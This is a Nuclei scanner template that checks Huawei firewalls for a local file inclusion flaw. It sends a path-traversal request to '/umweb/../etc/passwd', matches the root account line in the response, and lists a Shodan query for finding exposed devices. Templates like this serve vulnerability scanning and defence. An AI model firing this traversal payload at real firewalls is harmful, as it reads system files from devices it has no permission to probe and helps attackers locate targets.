id: huawei-firewall-lfi

info:
  name: Huawei Firewall - Local File Inclusion
  author: taielab
  severity: high
  description: Huawei Firewall is vulnerable to LFI(Local File Inclusion)
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HUAWEI"
  tags: huawei,firewall,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 490a0046304402203715844af65d7d74d1aeca35c55b6c24a7cbfa49fa1a202ff28631bb9ee56913022069383aa92060d5f57f72215e131edaa486e6b8a773e18332ebce0d6af51d5829:922c64590222798bb761d5b6d8e72950